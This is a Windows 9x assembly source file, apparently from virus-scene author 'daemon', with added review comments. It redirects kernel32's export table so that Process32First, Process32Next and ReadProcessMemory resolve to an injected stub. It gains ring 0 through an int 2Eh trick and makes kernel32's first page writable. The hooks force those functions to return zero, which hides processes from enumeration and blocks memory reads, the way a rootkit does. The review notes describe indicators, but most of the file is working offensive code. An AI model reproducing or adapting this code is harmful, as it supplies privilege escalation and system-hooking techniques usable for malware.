;
; API hooking via export table redirecting!
;
;
; muzic: Pasquale Maassen - Destruction
; coder: daemon
; lang : assembler
; os : w9x ONLY!
;
;---------------------------------------------------------------------------
; Review notes (added). Syntax: MASM, Intel operand order, flat 32-bit model.
; What the code below does, as far as the listing shows:
;   1. main loads kernel32.dll and, for each of three export names
;      (Process32Next, Process32First, ReadProcessMemory), walks the export
;      directory to find the AddressOfFunctions entry for that name.
;   2. r0proc (run through callring0 / int 2Eh) rewrites that entry to
;      target_pos and copies the stub hook_process32_first..hook_ende to
;      kernel32 base + target_pos (RVAs 400h/500h/600h, i.e. inside the
;      module's first page).
;   3. hook_api then calls kernel32's export index 0 with a VxD-style argument
;      list that, per the author's comments, changes the attributes of that
;      first page to writable - presumably because the stub patches its own
;      `push imm32` immediates at run time (see hook_process32_first).
;   4. A call to a hooked export runs the original function and then returns
;      0 to the caller (`xor eax,eax` at done_1).
; Observable indicators, derived from the code: kernel32 export entries whose
; RVA points into the PE-header page, a writable first page of kernel32, and
; the three exports above returning 0 unconditionally.
; There is no error handling: no NULL check on LoadLibraryA, no bound against
; NumberOfNames in the name search (the author says as much below).
; Data is addressed through ebp = load delta (see delta_me) everywhere except
; main's `mov target_pos,...` and `inc already_hooked`, which use absolute
; addresses; that is only consistent while the image loads at its linked base.
; i2E_PoCallDriver comes from ntos.inc, which is not part of this listing.
; caption, MessageBoxA and GetProcAddress are declared but never used here.
;---------------------------------------------------------------------------
.586p
.Model Flat
extrn ExitProcess : PROC
extrn MessageBoxA : PROC
extrn LoadLibraryA : PROC
extrn GetProcAddress : PROC
include ntos.inc
.Data
caption db "daemon",0                   ; unused in this listing
save_base dd ?                          ; kernel32 image base (LoadLibraryA result)
save_export dd ?                        ; VA of kernel32's export directory
save_here dd ?                          ; VA of the AddressOfFunctions entry being redirected
save_original dd ?                      ; RVA read from that entry before it is overwritten (r0proc)
; stk / x1..x4: a small table of offsets ending in the address of r0proc.
; Nothing in this listing references stk or x1..x4; r0proc is reached through
; esi in hook_api instead.
stk dd offset x1
dd offset x2
x1 db 8 dup (0)
dd offset x3
x2 db 60h dup (0)
dd offset x4+24h
x4 db 18h dup (0)
x3 db 38h dup (0)
dd r0proc
already_hooked dd ?                     ; non-zero when the export entry already holds target_pos
api_to_hook dd ?                        ; -> NUL-terminated export name to search for
target_pos dd ?                         ; RVA in kernel32 receiving the stub; also the new export RVA
api_1 db "Process32First",0
api_2 db "Process32Next",0
api_3 db "ReadProcessMemory",0
.Code
; Entry point (see `End Main`): hook three exports, then exit.
; NOTE(review): ExitProcess is called without pushing an exit code, so
; whatever is on top of the stack is consumed as uExitCode.
main:
        mov target_pos,0400h            ; stub for Process32Next at kernel32+400h
        lea eax,api_2
        call hook_api
        mov target_pos,0500h            ; stub for Process32First at kernel32+500h
        lea eax,api_1
        call hook_api
        mov target_pos,0600h            ; stub for ReadProcessMemory at kernel32+600h
        lea eax,api_3
        call hook_api
        call ExitProcess
;----------------------------------------------------------
;
; HOOK ANY API IN KERNEL32.DLL
;
; input: eax = pointer to name of api
; target_pos = value where to put the shit!
;
;----------------------------------------------------------
; Out:   nothing; all registers are restored by pushad/popad.
; Uses:  ebp = load delta for the whole routine; edx = kernel32 base during
;        the name search; ecx = index into AddressOfNames when it ends.
; Side effects: export entry patched and stub copied (in ring 0, via r0proc),
;        page attributes of kernel32's first page changed (via `call eax`).
hook_api:
        pushad
        call delta_me                   ; ebp = actual address - linked address
delta_me:pop ebp
        sub ebp,offset delta_me
        mov [ebp+already_hooked],0
        mov [ebp+api_to_hook],eax
        call get_k32                    ; pushes the address of the string below as the argument
        db "kernel32.dll",0
get_k32:call LoadLibraryA
        mov [ebp+save_base],eax         ; eax = image base; no check for 0
        mov ebx,eax
        mov ecx,ebx
        mov edx,ecx
        push edx                        ; keep the base while edx is reused
        add ebx,[ebx+03ch] ; point to pe-header
        add ecx,[ebx+078h] ; point to export table now
        mov [ebp+save_export],ecx
        add edx,[ecx+020h] ; point edx to addressofnames!
        mov esi,edx                     ; esi -> AddressOfNames[0]
        pop edx                         ; edx = image base again
        xor ecx,ecx
        dec ecx                         ; ecx = -1; pre-incremented at `again`
;-----------------------------------------------------------------
; search the position now of our api!
;
; no error checking in here :((((
; be aware of the cruely exception handler ;-)))
;-----------------------------------------------------------------
; Loop invariant: ecx = index of the name being examined, esi -> the next
; AddressOfNames slot, edx = image base. No bound against NumberOfNames, so
; a name that is not exported walks past the end of the table.
again:
        inc ecx
        lodsd                           ; eax = RVA of name[ecx]
        add eax,edx                     ; -> VA of the exported name
        pushad
        mov esi,eax
        xor ecx,ecx
        push esi
hohi: lodsb                             ; ecx = strlen(name) + 1 (the NUL is counted)
        inc ecx
        test al,al
        jnz hohi
        pop esi
        mov edi,[ebp+api_to_hook]
        repz cmpsb                      ; compare ecx bytes, terminator included
; NOTE(review): ecx is also 0 when the mismatch is in the last byte compared,
; so an exported name that is a strict prefix of api_to_hook counts as found.
; The condition that cmpsb actually leaves is ZF, not the remaining count.
        test ecx,ecx
        jz found_
        popad
        jmp again
found_: popad                           ; restores ecx = index of the matching name, edx = base
;-----------------------------------------------------------------
; okay position found!
;
; now locate the function
;-----------------------------------------------------------------
; ecx = name index; map it through AddressOfNameOrdinals to the
; AddressOfFunctions slot of the same function.
done:
        mov esi,[ebp+save_export]
        mov esi,[esi+24h] ; addressofnameordinals
        add esi,edx
        mov ax,word ptr [esi+ecx*2] ; get counter
        and eax,0FFFFh                  ; ordinal index is 16-bit; clear the upper half
        mov esi,[ebp+save_export]
        mov esi,[esi+1ch] ; addressoffunctions
        add esi,edx
        lea ebx,[eax*4+esi]             ; ebx -> AddressOfFunctions[ordinal] (VA)
        push eax
        mov eax,[ebp+target_pos]
        cmp dword ptr [ebx],eax         ; entry already redirected to target_pos?
        jne not_hooked
        inc already_hooked              ; absolute address, unlike the [ebp+...] accesses elsewhere
not_hooked:
        pop eax
        mov [ebp+save_here],ebx
        lea esi,dword ptr [ebp+r0proc]  ; esi = routine callring0 hands to the ring-0 side
        call callring0                  ; r0proc patches the entry and copies the stub
; Compute kernel32's AddressOfFunctions[0] and call it with a VxD-style
; argument list. The author's comments label it VMM (VxD 1) service 0Dh with
; new page attributes; the pushed values are (attributes, 0, page count = 1,
; page number of the kernel32 base page). Which export sits at index 0 is
; assumed, not checked - presumably the Win9x VxD-call entry; TODO confirm.
; The target RVAs used by main (400h..600h) lie in this page, and the stub
; writes to itself at run time (see hook_process32_first).
        mov eax,[ebp+save_base]
        mov ebx,dword ptr [eax+3Ch]
        add ebx,eax                     ; ebx -> PE header
        mov ebx,[ebx+78h]               ; export directory RVA
        lea ebx,[ebx+1Ch+eax]           ; -> AddressOfFunctions field (VA)
        mov ebx,[ebx]                   ; AddressOfFunctions RVA
        add eax,[eax+ebx]               ; eax = base + AddressOfFunctions[0]
        push 020060000h ; New page attributes (writ.)
        push 0
        push 1h ; Number of pages
        mov ebx,[ebp+save_base]
        and ebx,0FFFFF000h
        ror ebx,012                     ; low 12 bits are zero, so this is addr >> 12 = page number
        push ebx ; page
        push 00001000Dh ; VxD 1 service D
        call eax
        popad
        ret
;------------------------------------------------------------
; r0proc - executed via callring0 (esi -> r0proc), i.e. on the ring-0 path
; the author describes below.
; Reads the original RVA from the export entry at save_here, patches the
; stub's first trampoline (the imm32 of the `push 012345678h` at n:) with the
; original function's VA, writes target_pos into the export entry, and copies
; the stub to kernel32 base + target_pos.
; When already_hooked is set only the bytes before n are copied, so the
; immediate patched by an earlier run is left untouched.
; Clobbers nothing visible: pushad/popad around the body.
;------------------------------------------------------------
r0proc:
        pushad
        call delta_x                    ; ebp = load delta (same pattern as hook_api)
delta_x:pop ebp
        sub ebp,offset delta_x
        mov ebx,[ebp+save_here]
        mov eax,[ebx]                   ; original RVA from AddressOfFunctions
        mov [ebp+save_original],eax
        add eax,[ebp+save_base]         ; -> VA of the original function
        cmp [ebp+already_hooked],0
        jne dont_mess
        mov dword ptr [ebp+replace-4],eax ; patch the `push imm32` at n: with the original VA
dont_mess:
        push eax
        mov eax,[ebp+target_pos]
        mov dword ptr [ebx],eax         ; export entry now resolves to the stub
        pop eax
        mov edi,[ebp+save_base]
        cmp [ebp+already_hooked],0
        je normal
        mov ecx,offset n - offset hook_process32_first ; re-hook: copy only up to n
        jmp normal2
normal:
        mov ecx,offset hook_ende-offset hook_process32_first ; first hook: whole stub
normal2:lea esi,[ebp+hook_process32_first]
        add edi,[ebp+target_pos]        ; edi = base + target_pos
        repz movsb                      ; repz on movsb behaves as plain rep (movsb does not set ZF)
        popad
        ret
;------------------------------------------------------------
; hook_process32_first .. hook_ende - the stub copied to kernel32+target_pos
; and installed for all three hooked names (main uses it for each one).
; Byte layout matters: the two `push 012345678h` immediates are patched in
; place (at replace-4 and replace2-4) and r0proc derives its copy length from
; these labels, so instructions must not be reordered or resized.
; Flow when a hooked export is called:
;   pushad; ebp = delta of this copy; the caller's return address is stored
;   into the second trampoline's immediate; the caller's return slot is
;   pointed at replace+1; popad; `push original / ret` runs the original
;   function; it returns to replace+1: pushad; (commented-out code); popad;
;   eax = 0; `push caller_ret / ret` - the caller sees a zero return value.
; NOTE(review): the saved return address lives in a single slot inside the
; code, so nested or concurrent calls of a hooked export overwrite each
; other's return address.
;------------------------------------------------------------
hook_process32_first:
        pushad
        call get_delta
get_delta:pop ebp
        sub ebp,offset get_delta
        lea eax,[ebp+replace2]          ; result unused (eax is reloaded below and restored by popad)
        mov ebx,[esp+020h]              ; caller's return address, above the 8 pushed registers
        mov dword ptr [ebp+replace2-4],ebx ; -> imm32 of the push before replace2
        lea eax,[ebp+replace+1]         ; the pushad right after `replace:ret`
        mov [esp+020h],eax              ; the original function will return into the stub
        popad
n: push 012345678h                      ; patched by r0proc: VA of the original function
replace:ret
        pushad
; mov edi,[esp+4h]
; mov edi,[esp+8h+020h]
; and dword ptr [edi+08h],0
; lea edi,[edi+024h]
; mov esi,edi
;k_boy: lodsd
; test eax,eax
; jz done_1
; mov eax,'KCUF'
; stosd
; jmp k_boy
done_1: popad
        xor eax,eax                     ; force a zero return value for the caller
        push 012345678h                 ; patched above: the caller's return address
replace2:ret
hook_ende equ $
;------------------------------------------------------------
;
; and the illegal ring 0 routine!
;
;------------------------------------------------------------
; callring0 - In: esi -> routine to execute (r0proc). @@X builds a frame on
; the stack that embeds that pointer and issues int 2Eh with
; al = i2E_PoCallDriver (ntos.inc). The frame layout expected by the service
; is not verifiable from this listing - TODO confirm against the interface
; it targets.
; The 84h bytes pushed in @@X plus the return address of `call @@X` are
; discarded by `add esp, 88h`, so on the ring-3 path `popa / ret` returns
; straight to callring0's caller and the `pusha / call dword ptr [ecx] /
; popa / ret 8` block is never reached from here; presumably its address,
; pushed by `call @@X`, is what the service invokes - TODO confirm.
callring0:
        pusha
        call @@X
        pusha
        call dword ptr [ecx]            ; ecx is set by whoever enters here; not by this file
        popa
        ret 8
@@X:
        sub esp, 14h
        xor eax, eax
        push eax
        lea edx, [esp+24h]
        push edx
        sub esp, 54h
        lea edx, [esp+38h]
        push edx
        push edx
        push esi                        ; the routine pointer goes into the frame
        mov edx, esp
        push edx
        push edx
        mov edx, esp
        mov al, i2E_PoCallDriver
        int 2Eh
        add esp, 88h                    ; frame (84h) + return address of `call @@X`
        popa
        ret
End Main ;End of code, Main is the entrypoint